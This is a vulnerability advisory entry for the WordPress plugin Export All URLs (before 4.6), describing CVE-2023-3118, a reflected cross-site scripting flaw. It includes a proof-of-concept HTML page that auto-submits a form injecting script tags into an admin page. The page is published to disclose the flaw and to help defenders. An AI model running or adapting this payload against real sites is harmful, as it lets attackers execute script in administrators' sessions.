WordPress Plugin Vulnerabilities

Export All URLs < 4.6 - Reflected XSS

Description

The plugin does not sanitise and escape a parameter before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
        <input type="hidden" name="starting-point" value='"><script>alert(/XSS-starting-point/)</script>' />
       <input type="hidden" name="ending-point" value='"><script>alert(/XSS-ending-point/)</script>' />
        <input type="submit" value="submit">
    </form>
</body>

Affects Plugins

Plugin icon
export-all-urls
Fixed in 4.6

References

CVE
CVE-2023-3118

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Christiaan Swiers
Submitter
Christiaan Swiers
Submitter website
https://mijnsecuritypartner.nl
Submitter twitter
YouGina
Verified
Yes
WPVDB ID
8a9efc8d-561a-42c6-8e61-ae5c3be581ea

Timeline

Publicly Published
2023-06-19 (about 5 months ago)
Added
2023-06-19 (about 5 months ago)
Last Updated
2023-06-19 (about 5 months ago)

Other

Published
Title
Published
2022-06-02
Title
Download manager < 3.2.43 - Reflected Cross-Site Scripting
Published
2023-01-12
Title
Annual Archive < 1.6.0 - Contributor+ Stored XSS
Published
2023-01-17
Title
WP-CommentNavi < 1.12.2 - Admin+ Stored XSS
Published
2023-06-26
Title
Querlo Chatbot <= 1.2.4 - Stored Cross-Site Scripting
Published
2016-03-01
Title
Gravity Forms <= 1.9.15.11 - Authenticated Reflected Cross-Site Scripting (XSS)